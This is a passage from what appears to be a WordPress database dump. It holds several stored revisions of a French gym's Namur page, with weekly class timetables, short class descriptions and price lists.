class=\"size-full wp-image-409 aligncenter\" alt=\"zumba3\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/zumba3.jpg\" width=\"70\" height=\"24\" /></td>\r\n<td class=\"trip\"><b>19h45</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>19h45</b>\r\nCircuit</td>\r\n<td class=\"tzumba\"><b>19h45</b>\r\n<img class=\"size-full wp-image-409 aligncenter\" alt=\"zumba3\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/zumba3.jpg\" width=\"70\" height=\"24\" /></td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td>19h00</td>\r\n<td class=\"tzumba\"><b>19h45</b>\r\n<img class=\"size-full wp-image-409 aligncenter\" alt=\"zumba3\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/zumba3.jpg\" width=\"70\" height=\"24\" /></td>\r\n<td class=\"trip\"><b>19h45</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>19h45</b>\r\nCircuit</td>\r\n<td class=\"tzumba\"><b>19h45</b>\r\n<img class=\"size-full wp-image-409 aligncenter\" alt=\"zumba3\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/zumba3.jpg\" width=\"70\" height=\"24\" /></td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td>19h45</td>\r\n<td class=\"tzumba\"><b>19h45</b>\r\n<img class=\"size-full wp-image-409 aligncenter\" alt=\"zumba3\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/zumba3.jpg\" width=\"70\" height=\"24\" /></td>\r\n<td class=\"trip\"><b>19h45</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>19h45</b>\r\nCircuit</td>\r\n<td class=\"tzumba\"><b>19h45</b>\r\n<img class=\"size-full wp-image-409 aligncenter\" alt=\"zumba3\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/zumba3.jpg\" width=\"70\" height=\"24\" /></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n\r\n<span style=\"text-decoration: underline; background: #F2F5A9;\"><strong>TRX :</strong></span> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<span style=\"text-decoration: underline; background: #E6E6E6;\"><strong>Circuit :</strong></span> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline; background: #A9F5A9;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issus de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline; background: #A9F5F2;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !\r\n\r\n<img class=\"size-full wp-image-409 alignleft\" alt=\"zumba3\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/zumba3.jpg\" width=\"70\" height=\"24\" /> :<strong>La Zumba® </strong>est un mix de plusieurs danses latines (salsa, merengue, cumbia, reggaeton…), de fitness et d\'aérobie qui reste accessible à tout le monde quel que soit son niveau.\r\n<h1></h1>\r\n<h2>Réservation des séances :</h2>\r\nRéserver vos séances de Team Training en ligne : <a href=\"http://reservation.crosstrainingcenter.be\" target=\"_blank\">http://reservation.crosstrainingcenter.be</a>\r\n<h1></h1>\r\n<h2>Duo Training - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/contact/\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h1></h1>\r\n<h2>Personal Training - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/contact/\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h1></h1>\r\n<h2>Coaching nutritionnel - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/contact/\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé.\r\n<h1></h1>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Team Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 9.00€\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 6 mois illimité : 399.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances - Namur', '', 'inherit', 'open', 'open', '', '363-revision-v1', '', '', '2014-08-31 08:10:52', '2014-08-31 08:10:52', '', 363, 'http://www.crosstrainingcenter.be/363-revision-v1/', 0, 'revision', '', 0),
(449, 1, '2014-08-31 08:08:03', '2014-08-31 08:08:03', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenuhoover\">\r\n<div align=\"center\">\r\n\r\nNamur\r\n\r\n</div>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenu\">\r\n<div align=\"center\">\r\n\r\n<a title=\"Les séances – Limelette\" href=\"http://www.crosstrainingcenter.be/les-seances-limelette/\">Limelette</a>\r\n\r\n</div>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h1></h1>\r\n<h1>Small Group Training - Namur :</h1>\r\nEntrainements en groupe avec un coach qualifié (8 pers.). Nous vous proposons 7 types de séances décrites ci-dessous.\r\nPour suivre les cours de Small Group Training, vous devez d\'abord vous inscrire à une <a title=\"Séance booster\" href=\"http://www.crosstrainingcenter.be/266-2/\">séance Booster</a>. Cette séance, sur rendez-vous individuel, avec un coach durera 30 minutes. Durant cette séance, un bilan sera réalisé ainsi qu\'une découverte de l\'ensemble des outils du Cross Training Center.\r\n\r\n&nbsp;\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\">Heure</td>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"tvide\">15h30</td>\r\n<td class=\"tvide\"> - </td>\r\n<td class=\"tcardio\"><b>17h30</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>17h30</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>17h30</b>\r\nCircuit</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td>16h30</td>\r\n<td class=\"tglfe\"><b>18h15</b>\r\nCircuit</td>\r\n<td class=\"ttrx\"><b>18h15</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>18h15</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>18h15</b>\r\nRIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td>17h30</td>\r\n<td class=\"trip\"><b>19h00</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>19h00</b>\r\nCircuit</td>\r\n<td class=\"ttrx\"><b>19h00</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>19h00</b>\r\nCARDIO</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td>18h15</td>\r\n<td class=\"tzumba\"><b>19h45</b>\r\n<img class=\"size-full wp-image-409 aligncenter\" alt=\"zumba3\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/zumba3.jpg\" width=\"70\" height=\"24\" /></td>\r\n<td class=\"trip\"><b>19h45</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>19h45</b>\r\nCircuit</td>\r\n<td class=\"tzumba\"><b>19h45</b>\r\n<img class=\"size-full wp-image-409 aligncenter\" alt=\"zumba3\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/zumba3.jpg\" width=\"70\" height=\"24\" /></td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td>19h00</td>\r\n<td class=\"tzumba\"><b>19h45</b>\r\n<img class=\"size-full wp-image-409 aligncenter\" alt=\"zumba3\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/zumba3.jpg\" width=\"70\" height=\"24\" /></td>\r\n<td class=\"trip\"><b>19h45</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>19h45</b>\r\nCircuit</td>\r\n<td class=\"tzumba\"><b>19h45</b>\r\n<img class=\"size-full wp-image-409 aligncenter\" alt=\"zumba3\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/zumba3.jpg\" width=\"70\" height=\"24\" /></td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td>19h45</td>\r\n<td class=\"tzumba\"><b>19h45</b>\r\n<img class=\"size-full wp-image-409 aligncenter\" alt=\"zumba3\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/zumba3.jpg\" width=\"70\" height=\"24\" /></td>\r\n<td class=\"trip\"><b>19h45</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>19h45</b>\r\nCircuit</td>\r\n<td class=\"tzumba\"><b>19h45</b>\r\n<img class=\"size-full wp-image-409 aligncenter\" alt=\"zumba3\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/zumba3.jpg\" width=\"70\" height=\"24\" /></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n\r\n<span style=\"text-decoration: underline; background: #F2F5A9;\"><strong>TRX :</strong></span> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<span style=\"text-decoration: underline; background: #E6E6E6;\"><strong>Circuit :</strong></span> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline; background: #A9F5A9;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issus de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline; background: #A9F5F2;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !\r\n\r\n<img class=\"size-full wp-image-409 alignleft\" alt=\"zumba3\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/zumba3.jpg\" width=\"70\" height=\"24\" /> :<strong>La Zumba® </strong>est un mix de plusieurs danses latines (salsa, merengue, cumbia, reggaeton…), de fitness et d\'aérobie qui reste accessible à tout le monde quel que soit son niveau.\r\n<h1></h1>\r\n<h2>Réservation des séances :</h2>\r\nRéserver vos séances de Team Training en ligne : <a href=\"http://reservation.crosstrainingcenter.be\" target=\"_blank\">http://reservation.crosstrainingcenter.be</a>\r\n<h1></h1>\r\n<h2>Duo Training - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/contact/\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h1></h1>\r\n<h2>Personal Training - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/contact/\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h1></h1>\r\n<h2>Coaching nutritionnel - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/contact/\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé.\r\n<h1></h1>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Team Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 9.00€\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 6 mois illimité : 399.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances - Namur', '', 'inherit', 'open', 'open', '', '363-revision-v1', '', '', '2014-08-31 08:08:03', '2014-08-31 08:08:03', '', 363, 'http://www.crosstrainingcenter.be/363-revision-v1/', 0, 'revision', '', 0),
(452, 1, '2014-08-31 08:29:17', '2014-08-31 08:29:17', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenuhoover\">\r\n<div align=\"center\">\r\n\r\nNamur\r\n\r\n</div>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenu\">\r\n<div align=\"center\">\r\n\r\n<a title=\"Les séances – Limelette\" href=\"http://www.crosstrainingcenter.be/les-seances-limelette/\">Limelette</a>\r\n\r\n</div>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h1></h1>\r\n<h1>Small Group Training - Namur :</h1>\r\nEntrainements en groupe avec un coach qualifié (8 pers.). Nous vous proposons 7 types de séances décrites ci-dessous.\r\nPour suivre les cours de Small Group Training, vous devez d\'abord vous inscrire à une <a title=\"Séance booster\" href=\"http://www.crosstrainingcenter.be/266-2/\">séance Booster</a>. Cette séance, sur rendez-vous individuel, avec un coach durera 30 minutes. Durant cette séance, un bilan sera réalisé ainsi qu\'une découverte de l\'ensemble des outils du Cross Training Center.\r\n\r\n&nbsp;\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\">Heure</td>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"tvide\">15h30</td>\r\n<td class=\"tvide\"> - </td>\r\n<td class=\"tvide\"> - </td>\r\n<td class=\"tpsychomot\">Psychomotricité</td>\r\n<td class=\"tvide\"> - </td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tvide\">16h30</td>\r\n<td class=\"tvide\"> - </td>\r\n<td class=\"tvide\"> - </td>\r\n<td class=\"tvide\">Réservé Squash</td>\r\n<td class=\"tvide\"> - </td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"tvide\">17h30</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"tcardio\">Cardio</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"tcore\">Core</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tvide\">18h15</td>\r\n<td class=\"tvide\">Réservé Squash</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"tforce\">Force</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tvide\">19h00</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"ttrx\">TRX</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"ttrx\">TRX/Cardio</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tvide\">19h45</td>\r\n<td class=\"tvide\">Bootcamp</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"tvide\">Réservé Foot</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n\r\n<span style=\"text-decoration: underline; background: #F2F5A9;\"><strong>TRX :</strong></span> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<span style=\"text-decoration: underline; background: #E6E6E6;\"><strong>Circuit :</strong></span> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline; background: #A9F5A9;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issus de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline; background: #A9F5F2;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !\r\n\r\n<img class=\"size-full wp-image-409 alignleft\" alt=\"zumba3\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/zumba3.jpg\" width=\"70\" height=\"24\" /> :<strong>La Zumba® </strong>est un mix de plusieurs danses latines (salsa, merengue, cumbia, reggaeton…), de fitness et d\'aérobie qui reste accessible à tout le monde quel que soit son niveau.\r\n<h1></h1>\r\n<h2>Réservation des séances :</h2>\r\nRéserver vos séances de Team Training en ligne : <a href=\"http://reservation.crosstrainingcenter.be\" target=\"_blank\">http://reservation.crosstrainingcenter.be</a>\r\n<h1></h1>\r\n<h2>Duo Training - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/contact/\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h1></h1>\r\n<h2>Personal Training - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/contact/\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h1></h1>\r\n<h2>Coaching nutritionnel - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/contact/\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé.\r\n<h1></h1>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Team Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 9.00€\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 6 mois illimité : 399.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances - Namur', '', 'inherit', 'open', 'open', '', '363-revision-v1', '', '', '2014-08-31 08:29:17', '2014-08-31 08:29:17', '', 363, 'http://www.crosstrainingcenter.be/363-revision-v1/', 0, 'revision', '', 0),
(495, 3, '2015-09-02 17:04:28', '2015-09-02 17:04:28', '<a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/nouvelles-seances-CT.png\"><img class=\"alignnone size-full wp-image-494\" alt=\"nouvelles seances CT\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/nouvelles-seances-CT.png\" width=\"900\" height=\"635\" /></a>', 'Les séances - Namur', '', 'inherit', 'open', 'open', '', '363-revision-v1', '', '', '2015-09-02 17:04:28', '2015-09-02 17:04:28', '', 363, 'http://www.crosstrainingcenter.be/363-revision-v1/', 0, 'revision', '', 0),
(455, 1, '2014-08-31 08:41:03', '2014-08-31 08:41:03', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenuhoover\">\r\n<div align=\"center\">\r\n\r\nNamur\r\n\r\n</div>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenu\">\r\n<div align=\"center\">\r\n\r\n<a title=\"Les séances – Limelette\" href=\"http://www.crosstrainingcenter.be/les-seances-limelette/\">Limelette</a>\r\n\r\n</div>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h1></h1>\r\n<h1>Small Group Training - Namur :</h1>\r\nEntrainements en groupe avec un coach qualifié (8 pers.). Nous vous proposons 7 types de séances décrites ci-dessous.\r\nPour suivre les cours de Small Group Training, vous devez d\'abord vous inscrire à une <a title=\"Séance booster\" href=\"http://www.crosstrainingcenter.be/266-2/\">séance Booster</a>. Cette séance, sur rendez-vous individuel, avec un coach durera 30 minutes. Durant cette séance, un bilan sera réalisé ainsi qu\'une découverte de l\'ensemble des outils du Cross Training Center.\r\n\r\n&nbsp;\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\">Heure</td>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"tvide\">15h30</td>\r\n<td class=\"tvide\">-</td>\r\n<td class=\"tvide\">-</td>\r\n<td class=\"tpsychomot\">Psychomotricité</td>\r\n<td class=\"tvide\">-</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tvide\">16h30</td>\r\n<td class=\"tvide\">-</td>\r\n<td class=\"tvide\">-</td>\r\n<td class=\"tvide\">Réservé Squash</td>\r\n<td class=\"tvide\">-</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"tvide\">17h30</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"tcardio\">Cardio</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"tcore\">Core</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tvide\">18h15</td>\r\n<td class=\"tvide\">Réservé Squash</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"tforce\">Force</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tvide\">19h00</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"ttrx\">TRX</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"ttrx\">TRX/Cardio</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tvide\">19h45</td>\r\n<td class=\"tvide\">Bootcamp</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"tvide\">Réservé Foot</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n\r\n<span style=\"text-decoration: underline; background: #9FEDAC;\">Circuit Training</span> : Entraînement sur un circuit ultra complet, fun et adapté à votre niveau. Ce circuit utilise tous les outils.\r\n\r\n<span style=\"text-decoration: underline; background: #9FC6ED;\">Cardio</span> : Entraînement développant votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et pour perdre du poids (en complément avec un programme alimentaire) !\r\n\r\n<span style=\"text-decoration: underline; background: #EDE99F;\">TRX</span> : Entraînement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l’intensité que vous avez choisie.\r\n\r\n<span style=\"text-decoration: underline; background: #ED9FEA;\">Psychomotricité</span> : Séance réservée aux enfants de 3 à 6 ans.\r\n\r\n<span style=\"text-decoration: underline; background: #ED9FA2;\">Force</span> : Entraînement basé sur le travail de la force pure avec ou sans prise de masse (Kettlebel, barre, haltère,…)<b> </b>\r\n\r\n<span style=\"text-decoration: underline; background: #A2A186;\">Core</span> : Entraînement basé sur le travail du centre du corps (« core »). Nous enchaînerons les exercices sur les muscles abdominaux, dorsaux, fessiers,…\r\n\r\n<span style=\"text-decoration: underline; background: #EDE99F;\">TRX/Cardio</span> : Entraînement croisé entre le TRX et le cardio. Vous travaillerez ici votre endurance et votre renforcement musculaire global.\r\n\r\n&nbsp;\r\n<h1></h1>\r\n<h2>Réservation des séances :</h2>\r\nRéserver vos séances de Small Group Training en ligne : <a href=\"http://reservation.crosstrainingcenter.be\" target=\"_blank\">http://reservation.crosstrainingcenter.be</a>\r\n<h1></h1>\r\n<h2>Duo Training - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/contact/\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h1></h1>\r\n<h2>Personal Training - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/contact/\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h1></h1>\r\n<h2>Coaching nutritionnel - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/contact/\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé.\r\n<h1></h1>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Séance Booster</td>\r\n<td class=\"tcelluleprix\">20.00€ (Sur rendez-vous)\r\n30 min : 10 min de bilan + 20 min de découverte avec un coach en personal training</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Personal Training</td>\r\n<td class=\"tcelluleprix\">60 min : 60.00€<br>30 min : 35.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances - Namur', '', 'inherit', 'open', 'open', '', '363-revision-v1', '', '', '2014-08-31 08:41:03', '2014-08-31 08:41:03', '', 363, 'http://www.crosstrainingcenter.be/363-revision-v1/', 0, 'revision', '', 0),
(454, 1, '2014-08-31 08:36:41', '2014-08-31 08:36:41', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenuhoover\">\r\n<div align=\"center\">\r\n\r\nNamur\r\n\r\n</div>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenu\">\r\n<div align=\"center\">\r\n\r\n<a title=\"Les séances – Limelette\" href=\"http://www.crosstrainingcenter.be/les-seances-limelette/\">Limelette</a>\r\n\r\n</div>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h1></h1>\r\n<h1>Small Group Training - Namur :</h1>\r\nEntrainements en groupe avec un coach qualifié (8 pers.). Nous vous proposons 7 types de séances décrites ci-dessous.\r\nPour suivre les cours de Small Group Training, vous devez d\'abord vous inscrire à une <a title=\"Séance booster\" href=\"http://www.crosstrainingcenter.be/266-2/\">séance Booster</a>. Cette séance, sur rendez-vous individuel, avec un coach durera 30 minutes. Durant cette séance, un bilan sera réalisé ainsi qu\'une découverte de l\'ensemble des outils du Cross Training Center.\r\n\r\n&nbsp;\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\">Heure</td>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"tvide\">15h30</td>\r\n<td class=\"tvide\">-</td>\r\n<td class=\"tvide\">-</td>\r\n<td class=\"tpsychomot\">Psychomotricité</td>\r\n<td 